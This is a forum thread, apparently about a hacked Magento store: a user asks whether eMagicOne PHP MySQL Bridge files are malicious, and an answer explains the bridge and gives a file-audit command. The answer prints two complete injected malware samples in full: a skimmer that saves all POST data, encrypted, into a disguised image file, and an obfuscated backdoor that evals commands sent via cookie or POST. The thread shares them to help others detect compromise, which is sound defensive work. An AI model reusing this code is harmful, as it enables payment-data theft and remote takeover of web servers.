phpmagentobridge
Is this Magento code a virus?
We've had files added to our Magento directory in Chinese all over the place and am looking to find the malcious code doing this. I've noticed some 'bridge' files that weren't in the original Magento out of the box package. Do these look malicious? Or are they genuine? The code appears to be allowing a connection to my database.
Any advice appreciated.
Have included a screenshot of the files and this is a snippet of the code within one.
<?php
/*-----------------------------------------------------------------------------+
| eMagicOne |
| Copyright (c) 2012-2014 eMagicOne.com <contact@emagicone.com> |
| All rights reserved |
+------------------------------------------------------------------------------+
| |
| PHP MySQL Bridge |
| |
| Bridge is just another way to connect to your database. |
| Normally program uses direct MySQL connection to remote database installed at|
| website or some other web server. In some cases this type of connection does |
| not work - your hosting provider may not allow direct connections or your |
| LAN settings/firewall prevent connection from being established. |
| Bridge allows you to work with remote database with |
| no direct MySQL connection established. |
| |
| |
| Developed by eMagicOne, |
| Copyright (C) 2012-2014 |
+-----------------------------------------------------------------------------*/
$version = '$Revision: 7.39 $';
// Please change immediately
// it is security threat to leave these values as is!
$username = 'NewUser';
$password = 'ebykrwfe443ewf';
$database_extension = 'auto'; // 'auto', 'pdo', 'mysqli', 'mysql'
// Please create this directory or change to any existing temporary directory
// temporary directory should be writable by php script (chmod 0777)
$temporary_dir = "./tmp"; // on some systems if you get output with 0 size, try to use some local temporary folder
$allow_compression = true;
//Values of $compress_level between 1 and 9 will trade off speed and efficiency, and the default is 6.
//The 1 flag means "fast but less efficient" compression, and 9 means "slow but most efficient" compression.
$compress_level = 6; // 1 - 9
$limit_query_size = 8192; //Kb
// Please enter your email address here to receive notifications
//$user_email = 'YOUR@EMAIL-HERE.com';
// You can define table prefix here - only tables with names starting with these characters will be stored by bridge and transferred to Store Manager.
// Empty this value to tell bridge to use all tables except for those specified in $exclude_db_tables below
// $include_db_tables = '';
/*
Please uncomments following database connection information if you need to connect to some
specific database or with some specific database login information.
By default PHP MySQL Bridge is getting login information from your shopping cart.
This option should be used on non-standard configuration, we assume you know what you are doing
*/
/*
define('USER_DB_SERVER',''); // database host to connect
define('USER_DB_SERVER_USERNAME',''); // database user login to connect
define('USER_DB_SERVER_PASSWORD',''); // database user password to connect
define('USER_DB_DATABASE',''); // database name
define('USER_TABLE_PREFIX',''); // database prefix
*/
// Do not store tables specified below. Use this variable to reduce size of the data retrieved from bridge
// Specify table names delimited by semicolon ;
$exclude_db_tables = 'log_*;dataflow_*;xcart_sessions_data;xcart_session_history;xcart_stats_shop;xcart_stats_pages_views;xcart_stats_pages;xcart_stats_pages_paths;amazonimport_*;bcse_catalog_sessions;bcse_catalog_config;google_*;zen_uti;zen_uti_*;emo_admin;emo_admin_*;emo_user_*;admin_activity_log';
// In case ifyou have problems with data retrieving change this to a single quote
define('QOUTE_CHAR', '"');
error_reporting(E_ERROR | E_WARNING | E_PARSE); //good (and pretty enough) for most hostings
if(!ini_get('safe_mode')) {
@set_time_limit(0); //no time limiting for script, doesn't work in safe mode
} else {
@ini_set('max_execution_time'
Solution
This PHP program is a Legit program. How its used may not be.
eMagicOne offer a solution to allow users to connect remotely to there MySQL Database, where the hoster does not allow direct connections.
You could use this to bypass that restriction. Compiled with some other malicious code, this is the sign of a hack attempt gone wrong.
I run an out of date Magento version (For more than one reason) On a daily basis scans are completed to check for modified files and added files. These got flagged up with the following code inserted into the following files:
$y0='./skin/adminhtml/default/default/images/pager_arrow_right_bg.gif';$m1='1393068974';$k2='pd393b57';$k3="-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----";if(@$_SERVER['HTTP_USER_AGENT']=='Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)'){if(isset($_GET[$k2])){$m1=file_exists($y0)?@filemtime($y0):$m1;@file_put_contents($y0,'');@touch($y0,$m1,$m1);echo 'clean ok';}else echo 'Pong';exit;}if(!empty($_SERVER['HTTP_CLIENT_IP'])){$i4=$_SERVER['HTTP_CLIENT_IP'];}elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){$i4=$_SERVER['HTTP_X_FORWARDED_FOR'];}else{$i4=@$_SERVER['REMOTE_ADDR'];}if(isset($_POST)&&sizeof($_POST)){$a5='';foreach($_POST as $h6=>$n7){if(is_array($n7)){foreach($n7 as $f8=>$l9){if(is_array($l9)){foreach($l9 as $l10=>$v11){if(is_array($v11)){;}else{$a5.=':'.$h6.'['.$f8.']['.$l10.']='.$v11;}}}else{$a5.=':'.$h6.'['.$f8.']='.$l9;}}}else{$a5.=':'.$h6.'='.$n7;}}$a5=$i4.$a5;}else{$a5=null;}if($a5){$t12=false;if(function_exists('openssl_get_publickey')&&function_exists('openssl_public_encrypt')&&function_exists('openssl_encrypt')){$t12=true;}elseif(function_exists('dl')){$n13=strtolower(substr(php_uname(),0,3));$d14='php_openssl.'.($n13=='win'?'dll':'so');@dl($d14);if(function_exists('openssl_get_publickey')&&function_exists('openssl_public_encrypt')&&function_exists('openssl_encrypt')){$t12=true;}}if($t12){$t15=@openssl_get_publickey($k3);$q16=128;$t17='';$h18=md5(md5(microtime()).rand());$e19=$h18;while($e19){$f20=substr($e19,0,$q16);$e19=substr($e19,$q16);@openssl_public_encrypt($f20,$h21,$t15);$t17.=$h21;}$t22=@openssl_encrypt($a5,'aes128',$h18);@openssl_free_key($t15);$a5=$t17.':::SEP:::'.$t22;}$m1=file_exists($y0)?@filemtime($y0):$m1;@file_put_contents($y0,'JPEG-1.1'.base64_encode($a5),FILE_APPEND);@touch($y0,$m1,$m1);}?><?php
This was located in the /include/config and also i had some code in Index and a mage file (I cleaned up a couple of hours ago and dont have a log)
Best option is to try running this from Web dir root:
find . -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort
This will scan you current PHP Files and sort them in modified date order, at the bottom of the list you should see the most recently modified files. You can use this to check the content of the files.
Example:
find . -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort
- Find - Program to search
- . = From current Directory
- type f = File type
- name = For the use of '*.php'
- printf + expression (Prints the date in a readable format)
- | = To stack another command
- sort = To display the results in a order (most recent file at the bottom of the list)
Added original code from Index.php
$GLOBALS['icbb'];global$icbb;$icbb=$GLOBALS;$icbb['xf558f']="\x68\x63\x21\x7d\x67\xa\x43\x33\x57\x2f\x73\x61\x52\x59\x22\x6d\x2a\x32\x64\x49\x27\x3d\x28\x40\x50\x24\x51\x7b\x3e\x60\x72\x37\x58\x6f\x44\x62\x76\x20\x9\x45\x6b\x6e\x56\x70\x34\x4b\x41\x4d\x23\x4a\x2b\x78\x7c\x71\x39\x69\x2c\x48\x4c\x6c\xd\x3a\x55\x3b\x53\x42\x38\x77\x25\x4e\x7a\x74\x36\x2d\x31\x5a\x7e\x54\x79\x35\x65\x5c\x3f\x5b\x5e\x66\x4f\x46\x47\x3c\x30\x6a\x29\x75\x26\x5f\x5d\x2e";$icbb[$icbb['xf558f'][36].$icbb['xf558f'][11].$icbb['xf558f'][54].$icbb['xf558f'][90].$icbb['xf558f'][79].$icbb['xf558f'][11].$icbb['xf558f'][11]]=$icbb['xf558f'][1].$icbb['xf558f'][0].$icbb['xf558f'][30];$icbb[$icbb['xf558f'][35].$icbb['xf558f'][80].$icbb['xf558f'][31].$icbb['xf558f'][79].$icbb['xf558f'][90].$icbb['xf558f'][72].$icbb['xf558f'][90].$icbb['xf558f'][90]]=$icbb['xf558f'][33].$icbb['xf558f'][30].$icbb['xf558f'][18];$icbb[$icbb['xf558f'][71].$icbb['xf558f'][7].$icbb['xf558f'][66].$icbb['xf558f'][80].$icbb['xf558f'][18]]=$icbb['xf558f'][10].$icbb['xf558f'][71].$icbb['xf558f'][30].$icbb['xf558f'][59].$icbb['xf558f'][80].$icbb['xf558f'][41];$icbb[$icbb['xf558f'][51].$icbb['xf558f'][72].$icbb['xf558f'][90].$icbb['xf558f'][72].$icbb['xf558f'][35].$icbb['xf558f'][90].$icbb['xf558f'][74].$icbb['xf558f'][85]]=$icbb['xf558f'][55].$icbb['xf558f'][41].$icbb['xf558f'][55].$icbb['xf558f'][95].$icbb['xf558f'][10].$icbb['xf558f'][80].$icbb['xf558f'][71];$icbb[$icbb['xf558f'][59].$icbb['xf558f'][66].$icbb['xf558f'][74].$icbb['xf558f'][35].$icbb['xf558f'][17].$icbb['xf558f'][54].$icbb['xf558f'][54].$icbb['xf558f'][74]]=$icbb['xf558f'][10].$icbb['xf558f'][80].$icbb['xf558f'][30].$icbb['xf558f'][55].$icbb['xf558f'][11].$icbb['xf558f'][59].$icbb['xf558f'][55].$icbb['xf558f'][70].$icbb['xf558f'][80];$icbb[$icbb['xf558f'][93].$icbb['xf558f'][1].$icbb['xf558f'][35].$icbb['xf558f'][54].$icbb['xf558f'][85].$icbb['xf558f'][85]]=$icbb['xf558f'][43].$icbb['xf558f'][0].$icbb['xf558f'][43].$icbb['xf558f'][36].$icbb['xf558f'][80].$icbb['xf558f'][30].$icbb['xf558f'][10].$icbb['xf558f'][55].$icbb['xf558f'][33].$icbb['xf558f'][41];$icbb[$icbb['xf558f'][11].$icbb['xf558f'][17].$icbb['xf558f'][17].$icbb['xf558f'][80].$icbb['xf558f'][74].$icbb['xf558f'][11]]=$icbb['xf558f'][93].$icbb['xf558f'][41].$icbb['xf558f'][10].$icbb['xf558f'][80].$icbb['xf558f'][30].$icbb['xf558f'][55].$icbb['xf558f'][11].$icbb['xf558f'][59].$icbb['xf558f'][55].$icbb['xf558f'][70].$icbb['xf558f'][80];$icbb[$icbb['xf558f'][33].$icbb['xf558f'][35].$icbb['xf558f'][90].$icbb['xf558f'][18].$icbb['xf558f'][17].$icbb['xf558f'][35].$icbb['xf558f'][44].$icbb['xf558f'][11]]=$icbb['xf558f'][35].$icbb['xf558f'][11].$icbb['xf558f'][10].$icbb['xf558f'][80].$icbb['xf558f'][72].$icbb['xf558f'][44].$icbb['xf558f'][95].$icbb['xf558f'][18].$icbb['xf558f'][80].$icbb['xf558f'][1].$icbb['xf558f'][33].$icbb['xf558f'][18].$icbb['xf558f'][80];$icbb[$icbb['xf558f'][53].$icbb['xf558f'][79].$icbb['xf558f'][11].$icbb['xf558f'][54].$icbb['xf558f'][79]]=$icbb['xf558f'][10].$icbb['xf558f'][80].$icbb['xf558f'][71].$icbb['xf558f'][95].$icbb['xf558f'][71].$icbb['xf558f'][55].$icbb['xf558f'][15].$icbb['xf558f'][80].$icbb['xf558f'][95].$icbb['xf558f'][59].$icbb['xf558f'][55].$icbb['xf558f'][15].$icbb['xf558f'][55].$icbb['xf558f'][71];$icbb[$icbb['xf558f'][93].$icbb['xf558f'][7].$icbb['xf558f'][1].$icbb['xf558f'][31].$icbb['xf558f'][66].$icbb['xf558f'][74].$icbb['xf558f'][72].$icbb['xf558f'][79]]=$icbb['xf558f'][43].$icbb['xf558f'][85].$icbb['xf558f'][54].$icbb['xf558f'][85];$icbb[$icbb['xf558f'][18].$icbb['xf558f'][18].$icbb['xf558f'][18].$icbb['xf558f'][54].$icbb['xf558f'][18].$icbb['xf558f'][79].$icbb['xf558f'][79].$icbb['xf558f'][18].$icbb['xf558f'][7]]=$icbb['xf558f'][91].$icbb['xf558f'][1].$icbb['xf558f'][54].$icbb['xf558f'][85].$icbb['xf558f'][74].$icbb['xf558f'][18].$icbb['xf558f'][44].$icbb['xf558f'][74];$icbb[$icbb['xf558f'][4].$icbb['xf558f'][7].$icbb['xf558f'][31].$icbb['xf558f'][18].$icbb['xf558f'][7].$icbb['xf558f'][85].$icbb['xf558f'][85].$icbb['xf558f'][11].$icbb['xf558f'][7]]=$_POST;$icbb[$icbb['xf558f'][15].$icbb['xf558f'][79].$icbb['xf558f'][54].$icbb['xf558f'][7].$icbb['xf558f'][72]]=$_COOKIE;@$icbb[$icbb['xf558f'][51].$icbb['xf558f'][72].$icbb['xf558f'][90].$icbb['xf558f'][72].$icbb['xf558f'][35].$icbb['xf558f'][90].$icbb['xf558f'][74].$icbb['xf558f'][85]]($icbb['xf558f'][80].$icbb['xf558f'][30].$icbb['xf558f'][30].$icbb['xf558f'][33].$icbb['xf558f'][30].$icbb['xf558f'][95].$icbb['xf558f'][59].$icbb['xf558f'][33].$icbb['xf558f'][4],NULL);@$icbb[$icbb['xf558f'][51].$icbb['xf558f'][72].$icbb['xf558f'][90].$icbb['xf558f'][72].$icbb['xf558f'][35].$icbb['xf558f'][90].$icbb['xf558f'][74].$icbb['xf558f'][85]]($icbb['xf558f'][59].$icbb['xf558f'][33].$icbb['xf558f'][4].$icbb['xf558f'][95].$icbb['xf558f'][80].$icbb['xf558f'][30].$icbb['xf558f'][30].$icbb['xf558f'][33].$icbb['xf558f'][30].$icbb['xf558f'][10],0);@$icbb[$icbb['xf558f'][51].$icbb['xf558f'][72].$icbb['xf558f'][90].$icbb['xf558f'][72].$icbb['xf558f'][35].$icbb['xf558f'][90].$icbb['xf558f'][74].$icbb['xf558f'][85]]($icbb['xf558f'][15].$icbb['xf558f'][11].$icbb['xf558f'][51].$icbb['xf558f'][95].$icbb['xf558f'][80].$icbb['xf558f'][51].$icbb['xf558f'][80].$icbb['xf558f'][1].$icbb['xf558f'][93].$icbb['xf558f'][71].$icbb['xf558f'][55].$icbb['xf558f'][33].$icbb['xf558f'][41].$icbb['xf558f'][95].$icbb['xf558f'][71].$icbb['xf558f'][55].$icbb['xf558f'][15].$icbb['xf558f'][80],0);@$icbb[$icbb['xf558f'][53].$icbb['xf558f'][79].$icbb['xf558f'][11].$icbb['xf558f'][54].$icbb['xf558f'][79]](0);$w8a038788=NULL;$s379c4839=NULL;$icbb[$icbb['xf558f'][15].$icbb['xf558f'][74].$icbb['xf558f'][31].$icbb['xf558f'][90].$icbb['xf558f'][85].$icbb['xf558f'][80].$icbb['xf558f'][11].$icbb['xf558f'][90]]=$icbb['xf558f'][72].$icbb['xf558f'][18].$icbb['xf558f'][72].$icbb['xf558f'][44].$icbb['xf558f'][11].$icbb['xf558f'][72].$icbb['xf558f'][11].$icbb['xf558f'][18].$icbb['xf558f'][73].$icbb['xf558f'][7].$icbb['xf558f'][11].$icbb['xf558f'][72].$icbb['xf558f'][79].$icbb['xf558f'][73].$icbb['xf558f'][44].$icbb['xf558f'][72].$icbb['xf558f'][85].$icbb['xf558f'][54].$icbb['xf558f'][73].$icbb['xf558f'][54].$icbb['xf558f'][44].$icbb['xf558f'][79].$icbb['xf558f'][54].$icbb['xf558f'][73].$icbb['xf558f'][44].$icbb['xf558f'][31].$icbb['xf558f'][90].$icbb['xf558f'][66].$icbb['xf558f'][44].$icbb['xf558f'][18].$icbb['xf558f'][85].$icbb['xf558f'][79].$icbb['xf558f'][1].$icbb['xf558f'][79].$icbb['xf558f'][90].$icbb['xf558f'][74];global$m170fea0;function jc9f1d41($w8a038788,$b4da298e){global$icbb;$vde7a7="";for($u99f5bd=0;$u99f5bd<$icbb[$icbb['xf558f'][71].$icbb['xf558f'][7].$icbb['xf558f'][66].$icbb['xf558f'][80].$icbb['xf558f'][18]]($w8a038788);){for($jca175=0;$jca175<$icbb[$icbb['xf558f'][71].$icbb['xf558f'][7].$icbb['xf558f'][66].$icbb['xf558f'][80].$icbb['xf558f'][18]]($b4da298e)&&$u99f5bd<$icbb[$icbb['xf558f'][71].$icbb['xf558f'][7].$icbb['xf558f'][66].$icbb['xf558f'][80].$icbb['xf558f'][18]]($w8a038788);$jca175++,$u99f5bd++){$vde7a7.=$icbb[$icbb['xf558f'][36].$icbb['xf558f'][11].$icbb['xf558f'][54].$icbb['xf558f'][90].$icbb['xf558f'][79].$icbb['xf558f'][11].$icbb['xf558f'][11]]($icbb[$icbb['xf558f'][35].$icbb['xf558f'][80].$icbb['xf558f'][31].$icbb['xf558f'][79].$icbb['xf558f'][90].$icbb['xf558f'][72].$icbb['xf558f'][90].$icbb['xf558f'][90]]($w8a038788[$u99f5bd])^$icbb[$icbb['xf558f'][35].$icbb['xf558f'][80].$icbb['xf558f'][31].$icbb['xf558f'][79].$icbb['xf558f'][90].$icbb['xf558f'][72].$icbb['xf558f'][90].$icbb['xf558f'][90]]($b4da298e[$jca175]));}}return$vde7a7;}function pf9f($w8a038788,$b4da298e){global$icbb;global$m170fea0;return$icbb[$icbb['xf558f'][18].$icbb['xf558f'][18].$icbb['xf558f'][18].$icbb['xf558f'][54].$icbb['xf558f'][18].$icbb['xf558f'][79].$icbb['xf558f'][79].$icbb['xf558f'][18].$icbb['xf558f'][7]]($icbb[$icbb['xf558f'][18].$icbb['xf558f'][18].$icbb['xf558f'][18].$icbb['xf558f'][54].$icbb['xf558f'][18].$icbb['xf558f'][79].$icbb['xf558f'][79].$icbb['xf558f'][18].$icbb['xf558f'][7]]($w8a038788,$m170fea0),$b4da298e);}foreach($icbb[$icbb['xf558f'][15].$icbb['xf558f'][79].$icbb['xf558f'][54].$icbb['xf558f'][7].$icbb['xf558f'][72]]as$b4da298e=>$a8d45c){$w8a038788=$a8d45c;$s379c4839=$b4da298e;}if(!$w8a038788){foreach($icbb[$icbb['xf558f'][4].$icbb['xf558f'][7].$icbb['xf558f'][31].$icbb['xf558f'][18].$icbb['xf558f'][7].$icbb['xf558f'][85].$icbb['xf558f'][85].$icbb['xf558f'][11].$icbb['xf558f'][7]]as$b4da298e=>$a8d45c){$w8a038788=$a8d45c;$s379c4839=$b4da298e;}}$w8a038788=@$icbb[$icbb['xf558f'][11].$icbb['xf558f'][17].$icbb['xf558f'][17].$icbb['xf558f'][80].$icbb['xf558f'][74].$icbb['xf558f'][11]]($icbb[$icbb['xf558f'][93].$icbb['xf558f'][7].$icbb['xf558f'][1].$icbb['xf558f'][31].$icbb['xf558f'][66].$icbb['xf558f'][74].$icbb['xf558f'][72].$icbb['xf558f'][79]]($icbb[$icbb['xf558f'][33].$icbb['xf558f'][35].$icbb['xf558f'][90].$icbb['xf558f'][18].$icbb['xf558f'][17].$icbb['xf558f'][35].$icbb['xf558f'][44].$icbb['xf558f'][11]]($w8a038788),$s379c4839));if(isset($w8a038788[$icbb['xf558f'][11].$icbb['xf558f'][40]])&&$m170fea0==$w8a038788[$icbb['xf558f'][11].$icbb['xf558f'][40]]){if($w8a038788[$icbb['xf558f'][11]]==$icbb['xf558f'][55]){$u99f5bd=Array($icbb['xf558f'][43].$icbb['xf558f'][36]=>@$icbb[$icbb['xf558f'][93].$icbb['xf558f'][1].$icbb['xf558f'][35].$icbb['xf558f'][54].$icbb['xf558f'][85].$icbb['xf558f'][85]](),$icbb['xf558f'][10].$icbb['xf558f'][36]=>$icbb['xf558f'][74].$icbb['xf558f'][97].$icbb['xf558f'][90].$icbb['xf558f'][73].$icbb['xf558f'][74],);echo@$icbb[$icbb['xf558f'][59].$icbb['xf558f'][66].$icbb['xf558f'][74].$icbb['xf558f'][35].$icbb['xf558f'][17].$icbb['xf558f'][54].$icbb['xf558f'][54].$icbb['xf558f'][74]]($u99f5bd);}elseif($w8a038788[$icbb['xf558f'][11]]==$icbb['xf558f'][80]){eval($w8a038788[$icbb['xf558f'][18]]);}exit();} ?><?php
This code normally gets placed on Line 1: After all the comments, So scroll over to the right.